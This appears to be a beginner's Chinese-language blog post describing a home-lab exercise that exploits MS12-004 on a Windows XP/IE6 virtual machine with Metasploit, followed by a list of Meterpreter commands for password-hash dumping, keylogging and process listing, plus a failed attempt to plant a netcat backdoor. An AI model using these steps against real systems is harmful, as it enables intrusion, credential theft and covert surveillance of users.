对metasploit非常感兴趣,所以最近看了很多的教程。这篇是我模仿作者Breaker写的一篇入门级渗透,真的很入门。还望大神忽视。
单纯的想记录下我学习的结果zzzzzzzzzzzzzzzzzzzzz
环境:
1.kali Linux。
2.XP IE6。
好的,如下zzz:
1.msfconsole
2输入命令 search ms12_004,找 ms12-004 漏洞的利用模块
3.使用那个模块
4.设置一些参数:SRVHOST,payload(载荷) LHOST, URIPATH
5显示参数 show options
6.利用exploit
7用另一个虚拟机XP进入Using URL :http://192.168.10.134:8080/
它已卡死,接着浏览器自动退了吧。
8.Sucessfully! 查看会话:sessions
9.连接会话sessions -i 1,进入了meterpreter,并截图,。
10.run vnc虚拟连接进入,控制主机
11.当然这样不算完结,还要留后门,下次进入。Upload一个nc,(⑥⑥⑥的瑞士军刀)
蛋蛋蛋但是,后门我不会啊,试了好多次没成功,感觉好难搞似得,下次再研究,这次先到这了,已成功拿下我的XP。。。。
好菜 。。。。好水,不怎么懂郁闷。。。。。。。。。。。。。。。。。。
我去喝杯饮料压压惊。。。。。
常用的 Meterpreter命令
Meterpreter 是一个很强大的payload , 具体说明输入help可以看到,
Meterpreter hashdump // 可以看到进程主机帐号和加密后的密码
keyscan_start //开启键盘记录
heyscan_dump // 查看键盘记
keyscan_stop // 关闭键盘
ps // 获取进程主机进程列表
好了感谢教程所有者:Breaker。!! 虽然不认识,但是给了我好大帮助,特别信心啊!!!
(ps:后门不怎么懂(⊙o⊙)。)。哪位大神能否交流交流~~~~~~~~~~~~。
还有1分钟熄灯了,赶紧上传睡觉。